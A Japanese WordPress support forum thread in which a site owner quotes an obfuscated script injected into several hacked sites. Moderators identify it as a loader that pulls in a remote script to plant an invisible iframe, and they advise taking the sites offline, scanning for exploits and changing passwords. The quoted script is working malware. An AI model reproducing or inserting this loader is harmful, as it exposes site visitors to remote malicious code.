サポート » 使い方全般 » *GNU GPL* 管理画面のアクセスも不能に

  • 解決済 jiro

    (@jiro)


    はじめまして。
    どうぞ宜しくお願い致します。

    WPで作成した複数のサイトに以下のような表示がhtmlの先頭に入ってしまいます。

    <script>/*GNU GPL*/ try{window.onload = function(){var H3qqea3ur6p = document.createElement(‘script’);H3qqea3ur6p.setAttribute(‘type’, ‘text/javascript’);H3qqea3ur6p.setAttribute(‘id’, ‘myscript1’);H3qqea3ur6p.setAttribute(‘src’, ‘h#!t&##(t&()p$$:!#@/!(/$#l!)i!&v()@e!^(.$(!c!)o)m@.&!#g#@o((o^g)(l^$!e$)@.&)$c$#o(m#^@.)$b#@#!#a&i#!d^$#$u#)$!(-!((m^!s$)n$&(.@)@c^@$o((m!(&.^)(b&!!)e@s(&t@@a()r#$#)t))@s#!#)a!l##e@(.))&r$!u!&):)8(0$)@$8^#^@0&)$^/!!&w@$(o@^r(^(!d@^p^#)r#e@^s(&s&@@.(^^c#^o@!!m$)/)&^g@$(^o@(^o@g@&$l&&#e^))&@-($(m)#)a#)i^l^#.!&^)i!&t$@^/((!(l)!i&v^(&(e()#j^$a&s@(&m$^&(i$#@n!#^-#@)p$!!$h$!o(&#t(#o##)!b#!$u^c^#k((e&!)t#!((#.$$@c!&@o@m^)&/)!c&#(n$)e()&&t)#-^#!c^(@n^^n&#).)c!&!o$#m($/$^a&!@@b&()o^($(u!&#)t^#-#))e$@@)b##a#^y&&@.&#(^c&o^^m^@/(@^^’.replace(/\^|&|@|\)|\(|#|\!|\$/ig, ”));H3qqea3ur6p.setAttribute(‘defer’, ‘defer’);document.body.appendChild(H3qqea3ur6p);}} catch(e) {}</script>]

    サイトは文字化けになり、管理画面にもアクセスできなくなります。
    異なるバージョン、サーバーの複数のサイトで同じ現象が起きており
    原因が解らずにおります。

    サーバー:さくら、ロリポップ、ニフティなど
    バージョン:2.2.3~2.84 

    サーバーによっては下記ファイルにエラーがあるとメッセージが表示されます。
    wp-includes/pluggable.php

    どなかた解決方法をご存知でしたら何卒ご教示お願い致します。

3件の返信を表示中 - 1 - 3件目 (全3件中)
  • モデレーター jim912

    (@jim912)

    jiroさん、こんにちは。

    提示いただいたコードがは、あるサイトのjavascriptを呼び出し、それによって不可視のiframeタグを挿入しようとしているもののようです。
    iframeのリンク先がどうなっているかは確認していませんが、セキュリティ的に非常に問題がありますので、サイトの公開を一時停止してください。

    原因については、多々考えられます。
    プラグインの停止やテーマ変更で解消されるのであれば、該当するプラグイン、もしくはテーマの利用を中止すれば良いだけですが、本体ファイルを改変されている恐れも多分にあります。この場合は、WordPress Exploit Scanner などでチェックを行ってください。

    WordPress 日本語版用 Exploit Scanner ハッシュファイル

    トピック投稿者 jiro

    (@jiro)

    jim912様

    ありがとうございます。
    朝から格闘してファイル総入れ替えで消すことができました。

    管理しているサイトが同時多発的にこの現象が起きているので
    自動アップデータの問題かと思ってましたがこれってハッキングですよね。

    ハック関連のフォーラムも参考にしてみます。
    ありがとうござました。

    モデレーター IKEDA Yuriko

    (@lilyfan)

    短期的には、管理しているサイトすべてでパスワードを変更してください (WP のパスワード、DB のパスワード両方)。
    長期的には、共通で使っているテーマ・プラグインであやしいものは使用中止してください。

3件の返信を表示中 - 1 - 3件目 (全3件中)
  • トピック「*GNU GPL* 管理画面のアクセスも不能に」には新たに返信することはできません。